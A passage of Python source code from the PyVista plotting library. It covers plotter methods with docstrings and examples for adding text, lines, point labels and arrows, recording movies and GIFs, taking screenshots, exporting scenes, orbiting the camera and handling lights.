optional Either a string, RGB list, or hex color string. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` Defaults to :attr:`pyvista.global_theme.font.color <pyvista.themes._Font.color>`. font : str, optional Font name may be ``'courier'``, ``'times'``, or ``'arial'``. shadow : bool, optional Adds a black shadow to the text. Defaults to ``False``. name : str, optional The name for the added actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. 
viewport : bool, optional If ``True`` and position is a tuple of float, uses the normalized viewport coordinate system (values between 0.0 and 1.0 and support for HiDPI). render : bool, optional Force a render when ``True`` (default). Returns ------- vtk.vtkTextActor Text actor added to plot. Examples -------- >>> import pyvista >>> pl = pyvista.Plotter() >>> actor = pl.add_text('Sample Text', position='upper_right', color='blue', ... shadow=True, font_size=26) >>> pl.show() """ if font is None: font = self._theme.font.family if font_size is None: font_size = self._theme.font.size if position is None: # Set the position of the text to the top left corner window_size = self.window_size x = (window_size[0] * 0.02) / self.shape[0] y = (window_size[1] * 0.85) / self.shape[0] position = [x, y] corner_mappings = { 'lower_left': _vtk.vtkCornerAnnotation.LowerLeft, 'lower_right': _vtk.vtkCornerAnnotation.LowerRight, 'upper_left': _vtk.vtkCornerAnnotation.UpperLeft, 'upper_right': _vtk.vtkCornerAnnotation.UpperRight, 'lower_edge': _vtk.vtkCornerAnnotation.LowerEdge, 'upper_edge': _vtk.vtkCornerAnnotation.UpperEdge, 'left_edge': _vtk.vtkCornerAnnotation.LeftEdge, 'right_edge': _vtk.vtkCornerAnnotation.RightEdge, } corner_mappings['ll'] = corner_mappings['lower_left'] corner_mappings['lr'] = corner_mappings['lower_right'] corner_mappings['ul'] = corner_mappings['upper_left'] corner_mappings['ur'] = corner_mappings['upper_right'] corner_mappings['top'] = corner_mappings['upper_edge'] corner_mappings['bottom'] = corner_mappings['lower_edge'] corner_mappings['right'] = corner_mappings['right_edge'] corner_mappings['r'] = corner_mappings['right_edge'] corner_mappings['left'] = corner_mappings['left_edge'] corner_mappings['l'] = corner_mappings['left_edge'] if isinstance(position, (int, str, bool)): if isinstance(position, str): position = corner_mappings[position] elif position is True: position = corner_mappings['upper_left'] self.textActor = _vtk.vtkCornerAnnotation() # This is how you set the font size with this actor self.textActor.SetLinearFontScaleFactor(font_size // 2) self.textActor.SetText(position, text) else: self.textActor = _vtk.vtkTextActor() self.textActor.SetInput(text) self.textActor.SetPosition(position) if viewport: self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport() self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport() self.textActor.GetTextProperty().SetFontSize(int(font_size * 2)) self.textActor.GetTextProperty().SetColor( Color(color, default_color=self._theme.font.color).float_rgb ) self.textActor.GetTextProperty().SetFontFamily(FONTS[font].value) self.textActor.GetTextProperty().SetShadow(shadow) self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False, render=render) return self.textActor def open_movie(self, filename, framerate=24, quality=5, **kwargs): """Establish a connection to the ffmpeg writer. Parameters ---------- filename : str Filename of the movie to open. Filename should end in mp4, but other filetypes may be supported. See ``imagio.get_writer``. framerate : int, optional Frames per second. quality : int, optional Quality 10 is the top possible quality for any codec. The range is ``0 - 10``. Higher quality leads to a larger file. **kwargs : dict, optional See the documentation for ``imageio.get_writer`` for additional kwargs. 
Notes ----- See the documentation for `imageio.get_writer <https://imageio.readthedocs.io/en/stable/userapi.html#imageio.get_writer>`_ Examples -------- Open a MP4 movie and set the quality to maximum. >>> import pyvista >>> pl = pyvista.Plotter >>> pl.open_movie('movie.mp4', quality=10) # doctest:+SKIP """ from imageio import get_writer if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) self.mwriter = get_writer(filename, fps=framerate, quality=quality, **kwargs) def open_gif(self, filename): """Open a gif file. Parameters ---------- filename : str Filename of the gif to open. Filename must end in ``"gif"``. Examples -------- Open a gif file. >>> import pyvista >>> pl = pyvista.Plotter >>> pl.open_gif('movie.gif') # doctest:+SKIP """ from imageio import get_writer if filename[-3:] != 'gif': raise ValueError('Unsupported filetype. Must end in .gif') if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) self._gif_filename = os.path.abspath(filename) self.mwriter = get_writer(filename, mode='I') def write_frame(self): """Write a single frame to the movie file. Examples -------- >>> import pyvista >>> plotter = pyvista.Plotter() >>> plotter.open_movie(filename) # doctest:+SKIP >>> plotter.add_mesh(pyvista.Sphere()) # doctest:+SKIP >>> plotter.write_frame() # doctest:+SKIP See :ref:`movie_example` for a full example using this method. """ # if off screen, show has not been called and we must render # before extracting an image if self._first_time: self._on_first_render_request() self.render() if not hasattr(self, 'mwriter'): raise RuntimeError('This plotter has not opened a movie or GIF file.') self.update() self.mwriter.append_data(self.image) def _run_image_filter(self, ifilter): # Update filter and grab pixels ifilter.Modified() ifilter.Update() image = pyvista.wrap(ifilter.GetOutput()) img_size = image.dimensions img_array = pyvista.utilities.point_array(image, 'ImageScalars') # Reshape and write tgt_size = (img_size[1], img_size[0], -1) return img_array.reshape(tgt_size)[::-1] def get_image_depth(self, fill_value=np.nan, reset_camera_clipping_range=True): """Return a depth image representing current render window. Parameters ---------- fill_value : float, optional Fill value for points in image that do not include objects in scene. To not use a fill value, pass ``None``. reset_camera_clipping_range : bool, optional Reset the camera clipping range to include data in view. Returns ------- numpy.ndarray Image of depth values from camera orthogonal to image plane. Notes ----- Values in image_depth are negative to adhere to a right-handed coordinate system. Examples -------- >>> import pyvista >>> plotter = pyvista.Plotter() >>> actor = plotter.add_mesh(pyvista.Sphere()) >>> plotter.store_image = True >>> plotter.show() >>> zval = plotter.get_image_depth() """ # allow no render window if not hasattr(self, 'ren_win') and self.last_image_depth is not None: zval = self.last_image_depth.copy() if fill_value is not None: zval[self._image_depth_null] = fill_value return zval self._check_rendered() self._check_has_ren_win() # Ensure points in view are within clipping range of renderer? 
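        # What follows: (1) optionally reset the camera clipping range so the
        # whole scene lies inside it, (2) grab the normalized z-buffer via
        # vtkWindowToImageFilter with its input buffer type set to Z, and
        # (3) convert those values to depth from the camera using the near
        # and far clipping planes, masking anything at or beyond the far
        # plane as background so it can be replaced with ``fill_value``.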
if reset_camera_clipping_range: self.renderer.ResetCameraClippingRange() # Get the z-buffer image ifilter = _vtk.vtkWindowToImageFilter() ifilter.SetInput(self.ren_win) ifilter.ReadFrontBufferOff() ifilter.SetInputBufferTypeToZBuffer() zbuff = self._run_image_filter(ifilter)[:, :, 0] # Convert z-buffer values to depth from camera with warnings.catch_warnings(): warnings.filterwarnings('ignore') near, far = self.camera.clipping_range if self.camera.parallel_projection: zval = (zbuff - near) / (far - near) else: zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far) # Consider image values outside clipping range as nans self._image_depth_null = np.logical_or(zval < -far, np.isclose(zval, -far)) if fill_value is not None: zval[self._image_depth_null] = fill_value return zval def add_lines(self, lines, color='w', width=5, label=None, name=None): """Add lines to the plotting object. Parameters ---------- lines : np.ndarray or pyvista.PolyData Points representing line segments. For example, two line segments would be represented as ``np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])``. color : color_like, optional Either a string, rgb list, or hex color string. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` width : float, optional Thickness of lines. label : str, optional String label to use when adding a legend to the scene with :func:`pyvista.BasePlotter.add_legend`. name : str, optional The name for the added actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. Returns ------- vtk.vtkActor Lines actor. Examples -------- >>> import numpy as np >>> import pyvista >>> pl = pyvista.Plotter() >>> points = np.array([[0, 1, 0], [1, 0, 0], [1, 1, 0], [2, 0, 0]]) >>> actor = pl.add_lines(points, color='yellow', width=3) >>> pl.camera_position = 'xy' >>> pl.show() """ if not isinstance(lines, np.ndarray): raise TypeError('Input should be an array of point segments') lines = pyvista.lines_from_points(lines) # Create mapper and add lines mapper = _vtk.vtkDataSetMapper() mapper.SetInputData(lines) rgb_color = Color(color) # Create actor actor = _vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().SetLineWidth(width) actor.GetProperty().EdgeVisibilityOn() actor.GetProperty().SetEdgeColor(rgb_color.float_rgb) actor.GetProperty().SetColor(rgb_color.float_rgb) actor.GetProperty().LightingOff() # legend label if label: if not isinstance(label, str): raise TypeError('Label must be a string') addr = actor.GetAddressAsString("") self.renderer._labels[addr] = [lines, label, rgb_color] # Add to renderer self.add_actor(actor, reset_camera=False, name=name, pickable=False) return actor @wraps(ScalarBars.remove_scalar_bar) def remove_scalar_bar(self, *args, **kwargs): """Remove the active scalar bar.""" self.scalar_bars.remove_scalar_bar(*args, **kwargs) def add_point_labels( self, points, labels, italic=False, bold=True, font_size=None, text_color=None, font_family=None, shadow=False, show_points=True, point_color=None, point_size=5, name=None, shape_color='grey', shape='rounded_rect', fill_shape=True, margin=3, shape_opacity=1.0, pickable=False, render_points_as_spheres=False, tolerance=0.001, reset_camera=None, always_visible=False, render=True, ): """Create a point actor with one label from list labels assigned to each point. Parameters ---------- points : sequence or pyvista.DataSet An ``n x 3`` sequence points or pyvista dataset with points. 
labels : list or str List of labels. Must be the same length as points. If a string name is given with a :class:`pyvista.DataSet` input for points, then these are fetched. italic : bool, optional Italicises title and bar labels. Default ``False``. bold : bool, optional Bolds title and bar labels. Default ``True``. font_size : float, optional Sets the size of the title font. Defaults to 16. text_color : color_like, optional Color of text. Either a string, RGB sequence, or hex color string. * ``text_color='white'`` * ``text_color='w'`` * ``text_color=[1.0, 1.0, 1.0]`` * ``text_color='#FFFFFF'`` font_family : str, optional Font family. Must be either ``'courier'``, ``'times'``, or ``'arial``. shadow : bool, optional Adds a black shadow to the text. Defaults to ``False``. show_points : bool, optional Controls if points are visible. Default ``True``. point_color : color_like, optional Either a string, rgb list, or hex color string. One of the following. * ``point_color='white'`` * ``point_color='w'`` * ``point_color=[1.0, 1.0, 1.0]`` * ``point_color='#FFFFFF'`` point_size : float, optional Size of points if visible. name : str, optional The name for the added actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. shape_color : color_like, optional Color of points (if visible). Either a string, rgb sequence, or hex color string. shape : str, optional The string name of the shape to use. Options are ``'rect'`` or ``'rounded_rect'``. If you want no shape, pass ``None``. fill_shape : bool, optional Fill the shape with the ``shape_color``. Outlines if ``False``. margin : int, optional The size of the margin on the label background shape. Default is 3. shape_opacity : float, optional The opacity of the shape in the range of ``[0, 1]``. pickable : bool, optional Set whether this actor is pickable. render_points_as_spheres : bool, optional Render points as spheres rather than dots. tolerance : float, optional A tolerance to use to determine whether a point label is visible. A tolerance is usually required because the conversion from world space to display space during rendering introduces numerical round-off. reset_camera : bool, optional Reset the camera after adding the points to the scene. always_visible : bool, optional Skip adding the visibility filter. Default False. render : bool, optional Force a render when ``True`` (default). Returns ------- vtk.vtkActor2D VTK label actor. Can be used to change properties of the labels. Examples -------- >>> import numpy as np >>> import pyvista >>> pl = pyvista.Plotter() >>> points = np.array([[0.0, 0.0, 0.0], ... [1.0, 1.0, 0.0], ... [2.0, 0.0, 0.0]]) >>> labels = ['Point A', 'Point B', 'Point C'] >>> actor = pl.add_point_labels(points, labels, italic=True, font_size=20, ... point_color='red', point_size=20, ... render_points_as_spheres=True, ... 
always_visible=True, shadow=True) >>> pl.camera_position = 'xy' >>> pl.show() """ if font_family is None: font_family = self._theme.font.family if font_size is None: font_size = self._theme.font.size point_color = Color(point_color, default_color=self._theme.color) if isinstance(points, (list, tuple)): points = np.array(points) if isinstance(points, np.ndarray): vtkpoints = pyvista.PolyData(points) # Cast to poly data elif is_pyvista_dataset(points): vtkpoints = pyvista.PolyData(points.points) if isinstance(labels, str): labels = points.point_data[labels] else: raise TypeError(f'Points type not usable: {type(points)}') if len(vtkpoints.points) != len(labels): raise ValueError('There must be one label for each point') if name is None: name = f'{type(vtkpoints).__name__}({vtkpoints.memory_address})' vtklabels = _vtk.vtkStringArray() vtklabels.SetName('labels') for item in labels: vtklabels.InsertNextValue(str(item)) vtkpoints.GetPointData().AddArray(vtklabels) # Create hierarchy hier = _vtk.vtkPointSetToLabelHierarchy() hier.SetLabelArrayName('labels') if always_visible: hier.SetInputData(vtkpoints) else: # Only show visible points vis_points = _vtk.vtkSelectVisiblePoints() vis_points.SetInputData(vtkpoints) vis_points.SetRenderer(self.renderer) vis_points.SetTolerance(tolerance) hier.SetInputConnection(vis_points.GetOutputPort()) # create label mapper labelMapper = _vtk.vtkLabelPlacementMapper() labelMapper.SetInputConnection(hier.GetOutputPort()) if not isinstance(shape, str): labelMapper.SetShapeToNone() elif shape.lower() in 'rect': labelMapper.SetShapeToRect() elif shape.lower() in 'rounded_rect': labelMapper.SetShapeToRoundedRect() else: raise ValueError(f'Shape ({shape}) not understood') if fill_shape: labelMapper.SetStyleToFilled() else: labelMapper.SetStyleToOutline() labelMapper.SetBackgroundColor(Color(shape_color).float_rgb) labelMapper.SetBackgroundOpacity(shape_opacity) labelMapper.SetMargin(margin) textprop = hier.GetTextProperty() textprop.SetItalic(italic) textprop.SetBold(bold) textprop.SetFontSize(font_size) textprop.SetFontFamily(parse_font_family(font_family)) textprop.SetColor(Color(text_color, default_color=self._theme.font.color).float_rgb) textprop.SetShadow(shadow) self.remove_actor(f'{name}-points', reset_camera=False) self.remove_actor(f'{name}-labels', reset_camera=False) # add points if show_points: self.add_mesh( vtkpoints, color=point_color, point_size=point_size, name=f'{name}-points', pickable=pickable, render_points_as_spheres=render_points_as_spheres, reset_camera=reset_camera, render=render, ) label_actor = _vtk.vtkActor2D() label_actor.SetMapper(labelMapper) self.add_actor(label_actor, reset_camera=False, name=f'{name}-labels', pickable=False) return label_actor def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs): """Label the points from a dataset with the values of their scalars. Wrapper for :func:`pyvista.BasePlotter.add_point_labels`. Parameters ---------- points : numpy.ndarray or pyvista.DataSet An ``n x 3`` numpy.ndarray or pyvista dataset with points. labels : str, optional String name of the point data array to use. fmt : str, optional String formatter used to format numerical data. preamble : str, optional Text before the start of each label. **kwargs : dict, optional Keyword arguments passed to :func:`pyvista.BasePlotter.add_point_labels`. Returns ------- vtk.vtkActor2D VTK label actor. Can be used to change properties of the labels. 
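
        Examples
        --------
        A minimal sketch, assuming three labelled points carrying a
        hypothetical ``'values'`` point array.

        >>> import numpy as np
        >>> import pyvista
        >>> points = pyvista.PolyData(np.array([[0.0, 0.0, 0.0],
        ...                                     [1.0, 0.0, 0.0],
        ...                                     [2.0, 0.0, 0.0]]))
        >>> points['values'] = np.array([1.5, 2.5, 3.5])
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_point_scalar_labels(points, 'values', point_size=20)
        >>> pl.show()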
""" if not is_pyvista_dataset(points): raise TypeError(f'input points must be a pyvista dataset, not: {type(points)}') if not isinstance(labels, str): raise TypeError('labels must be a string name of the scalars array to use') if fmt is None: fmt = self._theme.font.fmt if fmt is None: fmt = '%.6e' scalars = points.point_data[labels] phrase = f'{preamble} %.3e' labels = [phrase % val for val in scalars] return self.add_point_labels(points, labels, **kwargs) def add_points(self, points, **kwargs): """Add points to a mesh. Parameters ---------- points : numpy.ndarray or pyvista.DataSet Array of points or the points from a pyvista object. **kwargs : dict, optional See :func:`pyvista.BasePlotter.add_mesh` for optional keyword arguments. Returns ------- vtk.vtkActor Actor of the mesh. Examples -------- Add a numpy array of points to a mesh. >>> import numpy as np >>> import pyvista >>> points = np.random.random((10, 3)) >>> pl = pyvista.Plotter() >>> actor = pl.add_points(points, render_points_as_spheres=True, ... point_size=100.0) >>> pl.show() """ kwargs['style'] = 'points' return self.add_mesh(points, **kwargs) def add_arrows(self, cent, direction, mag=1, **kwargs): """Add arrows to the plotter. Parameters ---------- cent : np.ndarray Array of centers. direction : np.ndarray Array of direction vectors. mag : float, optional Amount to scale the direction vectors. **kwargs : dict, optional See :func:`pyvista.BasePlotter.add_mesh` for optional keyword arguments. Returns ------- vtk.vtkActor VTK actor of the arrows. Examples -------- Plot a random field of vectors and save a screenshot of it. >>> import numpy as np >>> import pyvista >>> cent = np.random.random((10, 3)) >>> direction = np.random.random((10, 3)) >>> plotter = pyvista.Plotter() >>> _ = plotter.add_arrows(cent, direction, mag=2) >>> plotter.show() """ if cent.shape != direction.shape: # pragma: no cover raise ValueError('center and direction arrays must have the same shape') direction = direction.copy() if cent.ndim != 2: cent = cent.reshape((-1, 3)) if direction.ndim != 2: direction = direction.reshape((-1, 3)) if mag != 1: direction = direction * mag pdata = pyvista.vector_poly_data(cent, direction) # Create arrow object arrow = _vtk.vtkArrowSource() arrow.Update() glyph3D = _vtk.vtkGlyph3D() glyph3D.SetSourceData(arrow.GetOutput()) glyph3D.SetInputData(pdata) glyph3D.SetVectorModeToUseVector() glyph3D.Update() arrows = wrap(glyph3D.GetOutput()) return self.add_mesh(arrows, **kwargs) @staticmethod def _save_image(image, filename, return_img): """Save to file and/or return a NumPy image array. This is an internal helper. """ if not image.size: raise ValueError('Empty image. 
Have you run plot() first?') # write screenshot to file if requested if isinstance(filename, (str, pathlib.Path, io.BytesIO)): from PIL import Image if isinstance(filename, (str, pathlib.Path)): filename = pathlib.Path(filename) if isinstance(pyvista.FIGURE_PATH, str) and not filename.is_absolute(): filename = pathlib.Path(os.path.join(pyvista.FIGURE_PATH, filename)) if not filename.suffix: filename = filename.with_suffix('.png') elif filename.suffix not in SUPPORTED_FORMATS: raise ValueError( f'Unsupported extension {filename.suffix}\n' f'Must be one of the following: {SUPPORTED_FORMATS}' ) filename = os.path.abspath(os.path.expanduser(str(filename))) Image.fromarray(image).save(filename) else: Image.fromarray(image).save(filename, format="PNG") # return image array if requested if return_img: return image def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True): """Save a screenshot of the rendering window as a graphic file. This can be helpful for publication documents. The supported formats are: * ``'.svg'`` * ``'.eps'`` * ``'.ps'`` * ``'.pdf'`` * ``'.tex'`` Parameters ---------- filename : str Path to fsave the graphic file to. title : str, optional Title to use within the file properties. raster : bool, optional Attempt to write 3D properties as a raster image. painter : bool, optional Configure the exporter to expect a painter-ordered 2D rendering, that is, a rendering at a fixed depth where primitives are drawn from the bottom up. Examples -------- >>> import pyvista >>> from pyvista import examples >>> pl = pyvista.Plotter() >>> _ = pl.add_mesh(examples.load_airplane(), smooth_shading=True) >>> _ = pl.add_background_image(examples.mapfile) >>> pl.save_graphic("img.svg") # doctest:+SKIP """ if not hasattr(self, 'ren_win'): raise AttributeError('This plotter is closed and unable to save a screenshot.') if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) filename = os.path.abspath(os.path.expanduser(filename)) extension = pyvista.fileio.get_ext(filename) writer = _vtk.lazy_vtkGL2PSExporter() modes = { '.svg': writer.SetFileFormatToSVG, '.eps': writer.SetFileFormatToEPS, '.ps': writer.SetFileFormatToPS, '.pdf': writer.SetFileFormatToPDF, '.tex': writer.SetFileFormatToTeX, } if extension not in modes: raise ValueError( f"Extension ({extension}) is an invalid choice.\n\n" f"Valid options include: {', '.join(modes.keys())}" ) writer.CompressOff() writer.SetFilePrefix(filename.replace(extension, '')) writer.SetInput(self.ren_win) modes[extension]() writer.SetTitle(title) writer.SetWrite3DPropsAsRasterImage(raster) if painter: writer.UsePainterSettings() writer.Update() def screenshot( self, filename=None, transparent_background=None, return_img=True, window_size=None ): """Take screenshot at current camera position. Parameters ---------- filename : str, pathlib.Path, BytesIO, optional Location to write image to. If ``None``, no image is written. transparent_background : bool, optional Whether to make the background transparent. The default is looked up on the plotter's theme. return_img : bool, optional If ``True`` (the default), a NumPy array of the image will be returned. window_size : 2-length tuple, optional Set the plotter's size to this ``(width, height)`` before taking the screenshot. Returns ------- numpy.ndarray Array containing pixel RGB and alpha. Sized: * [Window height x Window width x 3] if ``transparent_background`` is set to ``False``. 
* [Window height x Window width x 4] if ``transparent_background`` is set to ``True``. Examples -------- >>> import pyvista >>> sphere = pyvista.Sphere() >>> plotter = pyvista.Plotter(off_screen=True) >>> actor = plotter.add_mesh(sphere) >>> plotter.screenshot('screenshot.png') # doctest:+SKIP """ if window_size is not None: self.window_size = window_size # configure image filter if transparent_background is None: transparent_background = self._theme.transparent_background self.image_transparent_background = transparent_background # This if statement allows you to save screenshots of closed plotters # This is needed for the sphinx-gallery to work if not hasattr(self, 'ren_win'): # If plotter has been closed... # check if last_image exists if self.last_image is not None: # Save last image return self._save_image(self.last_image, filename, return_img) # Plotter hasn't been rendered or was improperly closed raise RuntimeError('This plotter is closed and unable to save a screenshot.') if self._first_time and not self.off_screen: raise RuntimeError( "Nothing to screenshot - call .show first or use the off_screen argument" ) # if off screen, show has not been called and we must render # before extracting an image if self._first_time: self._on_first_render_request() self.render() return self._save_image(self.image, filename, return_img) @wraps(Renderers.set_background) def set_background(self, *args, **kwargs): """Wrap ``Renderers.set_background``.""" self.renderers.set_background(*args, **kwargs) def generate_orbital_path(self, factor=3.0, n_points=20, viewup=None, shift=0.0): """Generate an orbital path around the data scene. Parameters ---------- factor : float, optional A scaling factor when building the orbital extent. n_points : int, optional Number of points on the orbital path. viewup : list(float), optional The normal to the orbital plane. shift : float, optional Shift the plane up/down from the center of the scene by this amount. Returns ------- pyvista.PolyData PolyData containing the orbital path. Examples -------- Generate an orbital path around a sphere. >>> import pyvista >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(pyvista.Sphere()) >>> viewup = [0, 0, 1] >>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=50, ... shift=0.0, viewup=viewup) See :ref:`orbiting_example` for a full example using this method. """ if viewup is None: viewup = self._theme.camera['viewup'] center = np.array(self.center) bnds = np.array(self.bounds) radius = (bnds[1] - bnds[0]) * factor y = (bnds[3] - bnds[2]) * factor if y > radius: radius = y center += np.array(viewup) * shift return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points) def fly_to(self, point): """Move the current camera's focal point to a position point. The movement is animated over the number of frames specified in NumberOfFlyFrames. The LOD desired frame rate is used. Parameters ---------- point : sequence Point to fly to in the form of ``(x, y, z)``. """ self.iren.fly_to(self.renderer, point) def orbit_on_path( self, path=None, focus=None, step=0.5, viewup=None, write_frames=False, threaded=False, progress_bar=False, ): """Orbit on the given path focusing on the focus point. Parameters ---------- path : pyvista.PolyData Path of orbital points. The order in the points is the order of travel. focus : list(float) of length 3, optional The point of focus the camera. step : float, optional The timestep between flying to each camera position. 
viewup : list(float), optional The normal to the orbital plane. write_frames : bool, optional Assume a file is open and write a frame on each camera view during the orbit. threaded : bool, optional Run this as a background thread. Generally used within a GUI (i.e. PyQt). progress_bar : bool, optional Show the progress bar when proceeding through the path. This can be helpful to show progress when generating movies with ``off_screen=True``. Examples -------- Plot an orbit around the earth. Save the gif as a temporary file. >>> import tempfile >>> import os >>> import pyvista >>> filename = os.path.join(tempfile._get_default_tempdir(), ... next(tempfile._get_candidate_names()) + '.gif') >>> from pyvista import examples >>> plotter = pyvista.Plotter(window_size=[300, 300]) >>> _ = plotter.add_mesh(examples.load_globe(), smooth_shading=True) >>> plotter.open_gif(filename) >>> viewup = [0, 0, 1] >>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=24, ... shift=0.0, viewup=viewup) >>> plotter.orbit_on_path(orbit, write_frames=True, viewup=viewup, ... step=0.02) See :ref:`orbiting_example` for a full example using this method. """ if focus is None: focus = self.center if viewup is None: viewup = self._theme.camera['viewup'] if path is None: path = self.generate_orbital_path(viewup=viewup) if not is_pyvista_dataset(path): path = pyvista.PolyData(path) points = path.points # Make sure the whole scene is visible self.camera.thickness = path.length if progress_bar: try: from tqdm import tqdm except ImportError: # pragma: no cover raise ImportError("Please install `tqdm` to use ``progress_bar=True``") def orbit(): """Define the internal thread for running the orbit.""" if progress_bar: points_seq = tqdm(points) else: points_seq = points for point in points_seq: tstart = time.time() # include the render time in the step time self.set_position(point, render=False) self.set_focus(focus, render=False) self.set_viewup(viewup, render=False) self.renderer.ResetCameraClippingRange() if write_frames: self.write_frame() else: self.render() sleep_time = step - (time.time() - tstart) if sleep_time > 0: time.sleep(sleep_time) if write_frames: self.mwriter.close() if threaded: thread = Thread(target=orbit) thread.start() else: orbit() def export_vtkjs(self, filename, compress_arrays=False): """Export the current rendering scene as a VTKjs scene. It can be used for rendering in a web browser. Parameters ---------- filename : str Filename to export the scene to. A filename extension of ``'.vtkjs'`` will be added. compress_arrays : bool, optional Enable array compression. Examples -------- >>> import pyvista >>> from pyvista import examples >>> pl = pyvista.Plotter() >>> _ = pl.add_mesh(examples.load_hexbeam()) >>> pl.export_vtkjs("sample") # doctest:+SKIP """ if not hasattr(self, 'ren_win'): raise RuntimeError('Export must be called before showing/closing the scene.') if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) else: filename = os.path.abspath(os.path.expanduser(filename)) export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays) def export_obj(self, filename): """Export scene to OBJ format. Parameters ---------- filename : str Filename to export the scene to. Should end in ``'.obj'``. Returns ------- vtkOBJExporter Object exporter. 
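
        Examples
        --------
        A minimal sketch, assuming a still-open render window and a
        hypothetical output name ``scene.obj``.

        >>> import pyvista
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_mesh(pyvista.Sphere())
        >>> pl.export_obj('scene.obj')  # doctest:+SKIP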
""" # lazy import vtkOBJExporter here as it takes a long time to # load and is not always used try: from vtkmodules.vtkIOExport import vtkOBJExporter except: # noqa: E722 from vtk import vtkOBJExporter if not hasattr(self, "ren_win"): raise RuntimeError("This plotter must still have a render window open.") if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) else: filename = os.path.abspath(os.path.expanduser(filename)) exporter = vtkOBJExporter() exporter.SetFilePrefix(filename) exporter.SetRenderWindow(self.ren_win) return exporter.Write() def __del__(self): """Delete the plotter.""" # We have to check here if it has the closed attribute as it # may not exist should the plotter have failed to initialize. if hasattr(self, '_closed'): if not self._closed: self.close() self.deep_clean() if hasattr(self, 'renderers'): del self.renderers def add_background_image(self, image_path, scale=1, auto_resize=True, as_global=True): """Add a background image to a plot. Parameters ---------- image_path : str Path to an image file. scale : float, optional Scale the image larger or smaller relative to the size of the window. For example, a scale size of 2 will make the largest dimension of the image twice as large as the largest dimension of the render window. Defaults to 1. auto_resize : bool, optional Resize the background when the render window changes size. as_global : bool, optional When multiple render windows are present, setting ``as_global=False`` will cause the background to only appear in one window. Examples -------- >>> import pyvista >>> from pyvista import examples >>> plotter = pyvista.Plotter() >>> actor = plotter.add_mesh(pyvista.Sphere()) >>> plotter.add_background_image(examples.mapfile) >>> plotter.show() """ if self.renderers.has_active_background_renderer: raise RuntimeError( 'A background image already exists. ' 'Remove it with ``remove_background_image`` ' 'before adding one' ) # Need to change the number of layers to support an additional # background layer if not self._has_background_layer: self.ren_win.SetNumberOfLayers(3) renderer = self.renderers.add_background_renderer(image_path, scale, as_global) self.ren_win.AddRenderer(renderer) # set up autoscaling of the image if auto_resize: # pragma: no cover self.iren.add_observer('ModifiedEvent', renderer.resize) @wraps(Renderers.remove_background_image) def remove_background_image(self): """Wrap ``Renderers.remove_background_image``.""" self.renderers.remove_background_image() # return the active renderer to the top, otherwise flat background # will not be rendered self.renderer.layer = 0 def _on_first_render_request(self, cpos=None): """Once an image or render is officially requested, run this routine. For example on the show call or any screenshot producing code. """ # reset unless camera for the first render unless camera is set if self._first_time: # and not self.camera_set: for renderer in self.renderers: if not renderer.camera_set and cpos is None: renderer.camera_position = renderer.get_default_cam_pos() renderer.ResetCamera() elif cpos is not None: renderer.camera_position = cpos self._first_time = False def reset_camera_clipping_range(self): """Reset camera clipping planes.""" self.renderer.ResetCameraClippingRange() def add_light(self, light, only_active=False): """Add a Light to the scene. Parameters ---------- light : Light or vtkLight The light to be added. only_active : bool, optional If ``True``, only add the light to the active renderer. 
The default is that every renderer adds the light. To add the light to an arbitrary renderer, see :func:`pyvista.plotting.renderer.Renderer.add_light`. Examples -------- Create a plotter that we initialize with no lights, and add a cube and a single headlight to it. >>> import pyvista as pv >>> plotter = pv.Plotter(lighting='none') >>> _ = plotter.add_mesh(pv.Cube()) >>> light = pv.Light(color='cyan', light_type='headlight') >>> plotter.add_light(light) >>> plotter.show() """ renderers = [self.renderer] if only_active else self.renderers for renderer in renderers: renderer.add_light(light) def remove_all_lights(self, only_active=False): """Remove all lights from the scene. Parameters ---------- only_active : bool If ``True``, only remove lights from the active renderer. The default is that lights are stripped from every renderer. Examples -------- Create a plotter and remove all lights after initialization. Note how the mesh rendered is completely flat >>> import pyvista as pv >>> plotter = pv.Plotter() >>> plotter.remove_all_lights() >>> plotter.renderer.lights [] >>> _ = plotter.add_mesh(pv.Sphere(), show_edges=True) >>> plotter.show() Note how this differs from a plot with default lighting >>> pv.Sphere().plot(show_edges=True, lighting=True) """ renderers = [self.renderer] if only_active else self.renderers for renderer in renderers: renderer.remove_all_lights() def where_is(self, name): """Return the subplot coordinates of a given actor. Parameters ---------- name : str Actor's name. Returns ------- list(tuple(int)) A list with the subplot coordinates of the actor. Examples -------- >>> import pyvista as pv >>> plotter = pv.Plotter(shape=(2, 2)) >>> plotter.subplot(0, 0) >>> _ = plotter.add_mesh(pv.Box(), name='box') >>> plotter.subplot(0, 1) >>> _ = plotter.add_mesh(pv.Sphere(), name='sphere') >>> plotter.subplot(1, 0) >>> _ = plotter.add_mesh(pv.Box(), name='box') >>> plotter.subplot(1, 1) >>> _ = 